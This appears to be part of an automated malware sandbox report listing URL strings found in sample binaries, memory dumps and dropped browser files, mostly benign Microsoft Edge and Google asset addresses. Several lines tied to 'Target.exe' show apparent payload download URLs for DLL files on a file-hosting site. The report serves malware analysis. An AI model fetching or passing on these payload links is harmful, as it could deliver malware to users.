Source: zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB6DA000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_0.10.dr, background.js.2.dr	String found in binary or memory: http://www.gzip.org/zlib/rfc-gzip.html
Source: chromecache_520.13.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_520.13.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: Reporting and NEL.10.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: chromecache_514.13.dr, chromecache_520.13.dr	String found in binary or memory: https://apis.google.com
Source: 4cb013792b196a35_1.10.dr	String found in binary or memory: https://assets.msn.com/service/news/feed/pages/ntp
Source: 4cb013792b196a35_1.10.dr	String found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout
Source: 4cb013792b196a35_1.10.dr	String found in binary or memory: https://assets.msn.com/serviceak/news/feed/pages/ntp
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://bard.google.com/
Source: 4cb013792b196a35_1.10.dr	String found in binary or memory: https://bit.ly/wb-precache
Source: Reporting and NEL.10.dr	String found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: Network Persistent State0.10.dr	String found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json0.10.dr	String found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json0.10.dr	String found in binary or memory: https://chromewebstore.google.com/
Source: 9d44da8e-adec-4a59-9791-d41df16adce1.tmp.12.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.10.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 9d44da8e-adec-4a59-9791-d41df16adce1.tmp.12.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: chromecache_520.13.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_520.13.dr	String found in binary or memory: https://content.googleapis.com
Source: chromecache_520.13.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: Reporting and NEL.10.dr	String found in binary or memory: https://deff.nelreports.net/api/report
Source: Reporting and NEL.10.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: Reporting and NEL.10.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
Source: manifest.json.10.dr	String found in binary or memory: https://docs.google.com/
Source: chromecache_520.13.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: manifest.json.10.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json.10.dr	String found in binary or memory: https://drive.google.com/
Source: 000003.log0.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.75/asset?sv=2017-07-29&sr=c&sig=
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log0.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?sv=2017-07-29&
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k54
Source: Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dll
Source: Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/k541xr.dllJ
Source: Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4263822421.000001D0B3FC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/kwfxr7.dll
Source: chromecache_514.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_514.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_514.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_514.13.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000007.00000003.1738844921.000001CC7771A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC776F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC776E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1738844921.000001CC77707000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://gaana.com/
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
